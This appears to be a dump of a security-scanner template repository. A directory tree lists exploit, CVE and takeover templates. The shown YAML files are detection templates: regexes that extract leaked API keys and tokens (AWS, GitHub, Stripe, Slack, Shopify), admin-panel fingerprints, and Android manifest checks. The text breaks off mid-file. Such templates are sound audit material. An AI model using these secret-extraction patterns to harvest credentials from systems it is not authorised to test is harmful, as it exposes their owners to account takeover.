├── .gitattributes ├── expired-ssl.yaml ├── S3Hunter.yaml ├── crxde.yaml ├── file-scheme.yaml ├── api ├── pictatic-api-key.yaml ├── twilio-api.yaml ├── mailgun-api.yaml ├── slack-api.yaml ├── google-api.yaml ├── mailchimp-api.yaml ├── sendgrid-api.yaml ├── stripe-api-key.yaml ├── picatic-api-key.yaml ├── newrelic-rest-api-key.yaml ├── newrelic-admin-api-key.yaml ├── strapi-admin-exposure.yaml ├── wsdl-api.yaml ├── mailchimp-api-key.yaml ├── sendgrid-api-key.yaml ├── artifactory-api-token.yaml ├── google-api-key.yaml ├── artifactory-api-password.yaml ├── zapier-webhook-token.yaml ├── api-c99.yaml ├── api-fastly.yaml ├── strapi-panel.yaml └── strapi-page.yaml ├── content-scheme.yaml ├── shopify-token.yaml ├── debug-enabled.yaml ├── debug-pprof.yaml ├── git ├── github-app-token.yaml ├── github-oauth-token.yaml ├── github-personal-token.yaml ├── github-refresh-token.yaml ├── gitlab-ci.yaml └── github-enterprise-detect.yaml ├── home-assistant.yaml ├── shopify-shared-secret.yaml ├── aws ├── aws-access-id.yaml └── aws-access-key-value.yaml ├── crxde-lite.yaml ├── shopify-custom-token.yaml ├── shopify-private-token.yaml ├── square-oauth-secret.yaml ├── dynatrace-token.yaml ├── jmx-console.yaml ├── linkedin-id.yaml ├── webview-load-url.yaml ├── gcp-service-account.yaml ├── e-vulnerability ├── ds-store-leak.yaml ├── ikuai-login-panel.yaml ├── myucms-lfr.yaml ├── web-config.yaml ├── svn-leak.yaml ├── wordpress-wpconfig-inclosure.yaml ├── kingsoft-v8-rce.yaml ├── thinkcmf-lfi.yaml ├── sangfor-vpn-supersession-rce.yaml ├── yyoa-a6-userinfo-disclosure.yaml ├── natshell-arbitrary-file-read.yaml ├── dedecms-url-redirection.yaml ├── docker-registry.yaml ├── consul-rexec-rce.yaml ├── duomicms-sqli.yaml ├── fangweicms-sqli.yaml ├── maccms-rce.yaml ├── msvod-sqli.yaml └── nuuo-file-inclusion.yaml ├── facebook-client-id.yaml ├── facebook-secret.yaml ├── a-fingerprinting ├── grafana-detect.yaml ├── druid-panel.yaml ├── nacos-detect.yaml ├── solarwinds-orion-panel.yaml ├── spring-detect.yaml ├── django-admin-panel.yaml ├── sonicwall-management-panel.yaml ├── minio-browser.yaml ├── thinkphp-detect.yaml ├── wayos-panel.yaml ├── azure-kubernetes-service.yaml ├── landray-oa-panel.yaml ├── sonicwall-sslvpn-panel.yaml ├── zentao-detect.yaml └── mongodb-ops-manager.yaml ├── citrix-vpn-detect.yaml ├── cloudinary.yaml ├── credentials.yaml ├── flowci-detection.yaml ├── mongo-express-web-gui.yaml ├── samba-swat-panel.yaml ├── call-break-cms.yaml ├── certificate-validation.yaml ├── cockpit-detect.yaml ├── compal.yaml ├── couchdb-fauxton.yaml ├── cx-cloud-login.yaml ├── deadbolt-ransomware.yaml ├── flink-exposure.yaml ├── rabbitmq-dashboard.yaml ├── redash-detection.yaml ├── bitly-secret-key.yaml ├── kafka-connect-ui.yaml ├── slack-bot-token.yaml ├── hadoop-exposure.yaml ├── paypal-braintree-token.yaml ├── webview-javascript.yaml ├── wordpress ├── wp-xmlrpc.yaml └── wordpress-duplicator-path-traversal.yaml ├── kubernetes └── kubernetes-dashboard.yaml ├── mantis-detect.yaml ├── slack-user-token.yaml ├── slack-webhook.yaml ├── x-hacker.yaml ├── aims-password-mgmt-client.yaml ├── biometric-detect.yaml ├── kafka-topics-ui.yaml ├── kronos-workforce-central.yaml ├── maian-cart-detect.yaml ├── newrelic-insights-key.yaml ├── rocketmq-console-exposure.yaml ├── s3-detect.yaml ├── smtp-detection.yaml ├── square-access-token.yaml ├── supervpn-panel.yaml ├── webview-universal-access.yaml ├── X-Host.yaml ├── compal-panel.yaml ├── easyredir.yaml ├── firebase-database.yaml ├── solarwinds-orion.yaml ├── sonarqube-login.yaml ├── sql-server-reporting.yaml ├── zipkin-exposure.yaml ├── basic-cors-flash.yaml ├── jwt-token.yaml ├── kafka-monitoring.yaml ├── sonicwall-sslvpn-panel.yaml ├── stridercd-detection.yaml ├── stripe-secret-key.yaml ├── twitter-secret.yaml ├── unauthenticated-lansweeper.yaml ├── vm ├── vmware-vcenter-lfi-linux.yaml ├── saferoads-vms-login.yaml └── vmware-horizon.yaml ├── yopass-panel.yaml ├── amazon-sns-token.yaml ├── amazon-sns-topic.yaml ├── argocd-detect.yaml ├── bazarr-login.yaml ├── exposed-pagespeed-global-admin.yaml ├── oauth-access-key.yaml ├── parallels-html-client.yaml ├── urge-takeover.yaml ├── webview-addjavascript-interface.yaml ├── X-Client-IP.yaml ├── branch-key.yaml ├── manage-engine-admanager-panel.yaml ├── sonarqube-token.yaml ├── stripe-restricted-key.yaml ├── surge-takeover.yaml ├── versa-sdwan.yaml ├── werkzeug-debugger-detect.yaml ├── bmc-panel-detect.yaml ├── jkstatus-manager.yaml ├── kinsta-takeover.yaml ├── X-Remote-Addr.yaml ├── cve ├── 2007 │ └── CNVD-200705-315.yaml ├── 2015 │ └── CVE-2015-7297.yaml ├── 2017 │ ├── CVE-2017-16877.yaml │ ├── CVE-2017-8917.yaml │ └── CVE-2017-1000028.yaml ├── 2018 │ ├── CVE-2018-12613.yaml │ ├── CVE-2018-7490.yaml │ └── CVE-2018-10736.yaml ├── 2019 │ ├── CNVD-2019-16798.yaml │ ├── CVE-2019-18394.yaml │ └── CVE-2019-11510.yaml ├── 2020 │ ├── CNVD-2020-57264.yaml │ └── CVE-2020-5515.yaml ├── 2021 │ ├── CVE-2021-29622.yaml │ └── CNVD-2021-10543.yaml └── 2022 │ └── CVE-2022-33891.yaml ├── discord-webhook.yaml ├── httpbin-detection.yaml ├── jdbc-connection-string.yaml ├── x-forwarded-for.yaml ├── b-disclosure └── hadoop-disclosure.yaml ├── c-unauthorized ├── frp-unauthenticated.yaml ├── kibana-unauth.yaml ├── jeecg-boot.yaml ├── ruoyi-druid-unauth.yaml ├── airflow-unauth.yaml └── spark-api-unauth.yaml ├── circleci.yaml ├── dynamic-broadcast-receiver.yaml ├── google ├── google-storage.yaml ├── google-mapsembed.yaml ├── google-calendar-link.yaml ├── google-staticmaps.yaml └── google-mapsembedadvanced.yaml ├── jazzhr-takeover.yaml ├── mashery-takeover.yaml ├── newrelic-synthetics-location-key.yaml ├── prometheus-exposed-panel.yaml ├── provider-path.yaml ├── selenoid-ui-exposure.yaml ├── smugmug-takeover.yaml ├── surveygizmo-takeover.yaml ├── tave-takeover.yaml ├── ansible-config-disclosure.yaml ├── dotcms-admin-panel.yaml ├── fastly-takeover.yaml ├── hatenablog-takeover.yaml ├── lazy-file.yaml ├── readme-takeover.yaml ├── server-status.yaml ├── traefik-dashboard.yaml ├── webmin └── webmin-panel.yaml ├── zendesk-takeover.yaml ├── druid-console-exposure.yaml ├── electron-version-detect.yaml ├── exposed-webalizer.yaml ├── feedpress-takeover.yaml ├── gemfury-takeover.yaml ├── memcached-stats.yaml ├── readthedocs-takeover.yaml ├── smartling-takeover.yaml ├── teamwork-takeover.yaml ├── zoho-webhook-token.yaml ├── agilecrm-takeover.yaml ├── aha-takeover.yaml ├── braintree-access-token.yaml ├── cloudinary-credentials.yaml ├── empirecms-detect.yaml ├── hmc-hybris-panel.yaml ├── pentaho-panel.yaml ├── perl-status.yaml ├── sap-router.yaml ├── struts-debug-mode.yaml ├── symfony ├── symfony-detect.yaml ├── symfony-phpinfo.yaml ├── sqli-symfony.yaml └── symfony-profiler.yaml ├── vend-takeover.yaml ├── zentral-detection.yaml ├── checkmarx-panel.yaml ├── drupal └── drupal-install.yaml ├── helpjuice-takeover.yaml ├── jiva-admin-exposure.yaml ├── netscalar-aaa-login.yaml ├── sonicwall-management-panel.yaml ├── wishpond-takeover.yaml ├── X-Remote-IP.yaml ├── airflow-configuration-exposure.yaml ├── apache ├── apache-dubbo-detect.yaml ├── default-tomcat-page.yaml └── public-tomcat-instance.yaml ├── cx-cloud-upload-detect.yaml ├── default-iis7-page.yaml ├── emqx-detection.yaml ├── fcm-server-key.yaml ├── hashicorp-consul-version.yaml ├── jetbrains-takeover.yaml ├── unbounce-takeover.yaml ├── wangshen-file.yaml ├── Airflow-unauthorized.yaml ├── airee-takeover.yaml ├── cx-cloud-login-1.yaml ├── elmah-log-file.yaml ├── gradle-enterprise-build-cache-detect.yaml ├── helpscout-takeover.yaml ├── misconfigured-concrete5.yaml ├── network-camera-detect.yaml ├── ngrok-takeover.yaml ├── rails-debug-mode.yaml ├── slack-webhook-token.yaml ├── somfy-login.yaml ├── amazon-mws-auth-token.yaml ├── citrix-adc-gateway-detect.yaml ├── cx-cloud-login-2.yaml ├── exposed-kafdrop.yaml ├── fanruanoa2012-detect.yaml ├── find-config.xml copy.yaml ├── hashicorp-vault-detect.yaml ├── jspxcms-detect.yaml ├── lancom-router-panel.yaml ├── leostream-detection.yaml ├── openweather.yaml ├── pbootcms-detect.yaml ├── rstudio-detect.yaml ├── sap-hana-xsengine-panel.yaml ├── saprouter-detect.yaml ├── totemomail-smtp-detect.yaml ├── buttercms.yaml ├── default-movable-page.yaml ├── django └── django-admin-panel.yaml ├── entrust-identityguard.yaml ├── expn-mail-detect.yaml ├── harbor-detect.yaml ├── pantheon-takeover.yaml ├── uberflip-takeover.yaml ├── wakatime.yaml ├── amazon-docker-config.yaml ├── brightcove-takeover.yaml ├── d-default-pwd ├── mofi4500-default-password.yaml └── ns-icg-default-password.yaml ├── defectdojo-panel.yaml ├── fortinet-fortigate-panel.yaml ├── gerapy-detect.yaml ├── laravel-debug-error.yaml ├── netlify-cms.yaml ├── simplebooklet-takeover.yaml ├── xenforo-login.yaml ├── anima-takeover.yaml ├── extract-firebase-database.yaml ├── kafka-center-login.yaml ├── sophos-mobile-panel-detection.yaml ├── stripe.yaml ├── wildcard-postmessage.yaml ├── aspnuke-openredirect.yaml ├── clave-login-panel.yaml ├── default-jetty-page.yaml ├── druid-monitor.yaml ├── getresponse-takeover.yaml ├── ipstack.yaml ├── java-rmi-detect.yaml ├── livezilla-login-panel.yaml ├── myucms-lfr.yaml ├── sharecenter-login.yaml ├── xxljob-admin-detect.yaml ├── basic-auth-detection.yaml ├── dreambox-detect.yaml ├── ems-login-panel.yaml ├── instagram.yaml ├── jaspersoft-detect.yaml ├── lokalise.yaml ├── microsoft-teams-webhook.yaml ├── octoprint-login.yaml ├── openerp-database.yaml ├── sap-netweaver-portal.yaml ├── valid-gmail-check.yaml ├── webflow-takeover.yaml ├── wufoo-takeover.yaml ├── zenario-login-panel.yaml ├── aftership-takeover.yaml ├── amazon-docker-config-disclosure.yaml ├── calendly.yaml ├── code42-panel.yaml ├── crush-ftp-detect.yaml ├── edgeos-login.yaml ├── fuelcms-panel.yaml ├── hivemanager-login-panel.yaml ├── jira-unauthenticated-projects.yaml ├── mapbox.yaml ├── medium-takeover.yaml ├── netscaler-aaa-login.yaml ├── php ├── phpmyadmin-panel-1.yaml ├── phpmyadmin-panel-3.yaml ├── phpmyadmin-panel-10.yaml ├── phpmyadmin-panel-11.yaml ├── phpmyadmin-panel-2.yaml ├── phpmyadmin-panel-6.yaml ├── phpmyadmin-panel-7.yaml ├── phpmyadmin-panel-8.yaml └── phpmyadmin-panel-9.yaml ├── proposify-takeover.yaml ├── ricoh-pro8320-webserver.yaml ├── shiro-detect.yaml ├── starttls-mail-detect.yaml ├── CRMEB-sqli.yaml ├── asana.yaml ├── exposed-hg.yaml ├── exsi-system.yaml ├── frontify-takeover.yaml ├── gradle-enterprise-panel.yaml ├── node-red-detect.yaml ├── npm-log-file.yaml ├── oracle-dbass-detect.yaml ├── securenvoy-panel.yaml ├── workspace-one-uem.yaml ├── zipkin-exposure-1.yaml ├── adfs-detect.yaml ├── contacam.yaml ├── default-fastcgi-page.yaml ├── default-openresty.yaml ├── dotclear-detect.yaml ├── firebase-detect.yaml ├── froxlor-detect.yaml ├── jfrog.yaml ├── jira-unauthenticated-user-picker.yaml ├── mailgun.yaml ├── pingdom-takeover.yaml ├── powerlogic-ion.yaml ├── puppetboard-panel.yaml ├── spotify.yaml ├── synnefo-admin-panel.yaml └── vercel-takeover.yaml /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /expired-ssl.yaml: -------------------------------------------------------------------------------- 1 | id: expired-ssl 2 | 3 | info: 4 | name: Expired SSL Certificate 5 | author: pdteam 6 | severity: low 7 | tags: ssl 8 | 9 | ssl: 10 | - address: "{{Host}}:{{Port}}" 11 | matchers: 12 | - type: dsl 13 | dsl: 14 | - "unixtime() > not_after" 15 | -------------------------------------------------------------------------------- /S3Hunter.yaml: -------------------------------------------------------------------------------- 1 | id: s3-hunter 2 | 3 | info: 4 | name: Hunts for unreferenced AWS S3 Buckets 5 | author: glatisant 6 | severity: medium 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}' 11 | matchers: 12 | - type: word 13 | words: 14 | - 'ListBucketResult' -------------------------------------------------------------------------------- /crxde.yaml: -------------------------------------------------------------------------------- 1 | id: crxde 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crx/de/index.jsp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "CRXDE Lite" 16 | -------------------------------------------------------------------------------- /file-scheme.yaml: -------------------------------------------------------------------------------- 1 | id: file-scheme 2 | 3 | info: 4 | name: File Scheme Enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - xml 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:scheme=\"file\"" -------------------------------------------------------------------------------- /api/pictatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: pictatic-api-key 2 | 3 | info: 4 | name: Pictatic API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sk_live_[0-9a-z]{32}" -------------------------------------------------------------------------------- /api/twilio-api.yaml: -------------------------------------------------------------------------------- 1 | id: twilio-api 2 | 3 | info: 4 | name: Twilio API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" -------------------------------------------------------------------------------- /content-scheme.yaml: -------------------------------------------------------------------------------- 1 | id: content-scheme 2 | 3 | info: 4 | name: Content Scheme Enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - xml 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:scheme=\"content\"" -------------------------------------------------------------------------------- /shopify-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-access-token 2 | 3 | info: 4 | name: Shopify Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpat_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /api/mailgun-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailgun-api-key 2 | 3 | info: 4 | name: Mailgun API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file,mailgun 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "key-[0-9a-zA-Z]{32}" 17 | -------------------------------------------------------------------------------- /api/slack-api.yaml: -------------------------------------------------------------------------------- 1 | id: slack-api 2 | 3 | info: 4 | name: Slack API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file,slack 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "xox[baprs]-([0-9a-zA-Z]{10,48})?" 17 | -------------------------------------------------------------------------------- /debug-enabled.yaml: -------------------------------------------------------------------------------- 1 | id: android-debug-enabled 2 | 3 | info: 4 | name: Android Debug Enabled 5 | author: gaurang 6 | severity: low 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "android:debuggable=\"true\"" -------------------------------------------------------------------------------- /debug-pprof.yaml: -------------------------------------------------------------------------------- 1 | id: debug-pprof 2 | 3 | info: 4 | name: pprof debug file 5 | author: pdteam 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/debug/pprof/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Types of profiles available" 16 | -------------------------------------------------------------------------------- /git/github-app-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-app-token 2 | 3 | info: 4 | name: Github App Token 5 | author: tanq16 6 | severity: medium 7 | tags: token,file,github 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "gh[us]_.{36}" 17 | -------------------------------------------------------------------------------- /home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Home Assistant" 16 | -------------------------------------------------------------------------------- /api/google-api.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key-file 2 | 3 | info: 4 | name: Google API key 5 | author: gaurang 6 | severity: info 7 | tags: token,file,google 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "AIza[0-9A-Za-z\\-_]{35}" 17 | -------------------------------------------------------------------------------- /git/github-oauth-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-oauth-token 2 | 3 | info: 4 | name: Github OAuth Access Token 5 | author: tanq16 6 | severity: high 7 | tags: token,file,github 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "gho_.{36}" 17 | -------------------------------------------------------------------------------- /git/github-personal-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-personal-token 2 | 3 | info: 4 | name: Github Personal Token 5 | author: geeknik 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "ghp_.{36}" 17 | -------------------------------------------------------------------------------- /git/github-refresh-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-refresh-token 2 | 3 | info: 4 | name: Github Refresh Token 5 | author: tanq16 6 | severity: high 7 | tags: token,file,github 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "ghr_.{36}" 17 | -------------------------------------------------------------------------------- /shopify-shared-secret.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-shared-secret 2 | 3 | info: 4 | name: Shopify Shared Secret 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpss_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /aws/aws-access-id.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key 2 | 3 | info: 4 | name: AWS Access Key ID 5 | author: gaurang 6 | severity: low 7 | 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 16 | -------------------------------------------------------------------------------- /api/mailchimp-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-api-key 2 | 3 | info: 4 | name: Mailchimp API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file,mailchimp 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[0-9a-f]{32}-us[0-9]{1,2}" 17 | -------------------------------------------------------------------------------- /crxde-lite.yaml: -------------------------------------------------------------------------------- 1 | id: crxde-lite 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/crx/de/index.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "CRXDE Lite" 17 | -------------------------------------------------------------------------------- /shopify-custom-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-custom-token 2 | 3 | info: 4 | name: Shopify Custom App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpca_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /shopify-private-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-private-token 2 | 3 | info: 4 | name: Shopify Private App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shppa_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /square-oauth-secret.yaml: -------------------------------------------------------------------------------- 1 | id: square-oauth-secret 2 | 3 | info: 4 | name: Square OAuth Secret 5 | author: gaurang 6 | severity: high 7 | tags: token,file,square 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sq0csp-[0-9A-Za-z\\-_]{43}" 17 | -------------------------------------------------------------------------------- /dynatrace-token.yaml: -------------------------------------------------------------------------------- 1 | id: dynatrace-token 2 | 3 | info: 4 | name: Dynatrace Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" -------------------------------------------------------------------------------- /jmx-console.yaml: -------------------------------------------------------------------------------- 1 | id: jmx-console 2 | 3 | info: 4 | name: JMX Console 5 | author: yashanand155 6 | severity: low 7 | tags: panel,jmx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/jmx-console/' 13 | matchers: 14 | - type: word 15 | words: 16 | - JBoss JMX Management Console 17 | -------------------------------------------------------------------------------- /linkedin-id.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-client-id 2 | 3 | info: 4 | name: Linkedin Client ID 5 | author: gaurang 6 | severity: low 7 | tags: token,file,linkedin 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" 17 | -------------------------------------------------------------------------------- /api/sendgrid-api.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key-file 2 | 3 | info: 4 | name: Sendgrid API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file,sendgrid 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" 17 | -------------------------------------------------------------------------------- /api/stripe-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-api-key 2 | 3 | info: 4 | name: Stripe API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file,stripe 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" 17 | -------------------------------------------------------------------------------- /webview-load-url.yaml: -------------------------------------------------------------------------------- 1 | id: webview-load-url 2 | 3 | info: 4 | name: Webview loadUrl usage 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" -------------------------------------------------------------------------------- /gcp-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: gcp-service-account 2 | 3 | info: 4 | name: Google (GCP) Service-account 5 | author: gaurang 6 | severity: low 7 | tags: token,file,google 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "\"type\": \"service_account\"" 17 | -------------------------------------------------------------------------------- /e-vulnerability/ds-store-leak.yaml: -------------------------------------------------------------------------------- 1 | id: ds-store-leak 2 | 3 | info: 4 | name: Directory Listing via DS_Store 5 | author: 0w4ys 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /.DS_Store 14 | expression: response.status == 200 && response.body.bcontains(b'Bud1') 15 | expression: r0() -------------------------------------------------------------------------------- /facebook-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-client-id 2 | 3 | info: 4 | name: Facebook Client ID 5 | author: gaurang 6 | severity: info 7 | tags: token,file,facebook 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" 17 | -------------------------------------------------------------------------------- /facebook-secret.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-secret-key 2 | 3 | info: 4 | name: Facebook Secret Key 5 | author: gaurang 6 | severity: low 7 | tags: token,file,facebook 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" 17 | -------------------------------------------------------------------------------- /a-fingerprinting/grafana-detect.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-panel 2 | 3 | info: 4 | name: Grafana Panel 5 | author: organiccrap 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /login 14 | expression: response.status == 200 && response.body.bcontains(b'Grafana') 15 | expression: r0() -------------------------------------------------------------------------------- /citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: pdteam 6 | severity: info 7 | tags: panel,citrix 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/vpn/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Citrix Gateway" 17 | -------------------------------------------------------------------------------- /cloudinary.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-basic-auth 2 | 3 | info: 4 | name: Cloudinary Basic Auth 5 | author: gaurang 6 | severity: high 7 | tags: token,file,cloudinary 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" 17 | -------------------------------------------------------------------------------- /credentials.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-creds 2 | 3 | info: 4 | name: Basic Auth Credentials 5 | author: gaurang 6 | severity: high 7 | tags: token,file,auth 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" 17 | -------------------------------------------------------------------------------- /flowci-detection.yaml: -------------------------------------------------------------------------------- 1 | id: flowci-detection 2 | 3 | info: 4 | name: FlowCI Detection 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'flow-web-x' 19 | -------------------------------------------------------------------------------- /mongo-express-web-gui.yaml: -------------------------------------------------------------------------------- 1 | id: mongo-express-web-gui 2 | 3 | info: 4 | name: Mongo Express Web GUI 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Set-Cookie: mongo-express=" 16 | part: header 17 | -------------------------------------------------------------------------------- /samba-swat-panel.yaml: -------------------------------------------------------------------------------- 1 | id: samba-swat-panel 2 | 3 | info: 4 | name: Samba SWAT panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,samba 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Basic realm="SWAT"' 18 | part: header 19 | -------------------------------------------------------------------------------- /a-fingerprinting/druid-panel.yaml: -------------------------------------------------------------------------------- 1 | id: druid-panel 2 | 3 | info: 4 | name: Druid Panel 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /druid/login.html 14 | expression: response.status == 200 && response.body.bcontains(b'<title>druid monitor') 15 | expression: r0() -------------------------------------------------------------------------------- /api/picatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: picatic-api-key 2 | 3 | info: 4 | name: Picatic API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_live_[0-9a-z]{32}' -------------------------------------------------------------------------------- /call-break-cms.yaml: -------------------------------------------------------------------------------- 1 | id: call-break-cms 2 | 3 | info: 4 | name: Call Break CMS 5 | author: dhiyaneshDk 6 | severity: info 7 | 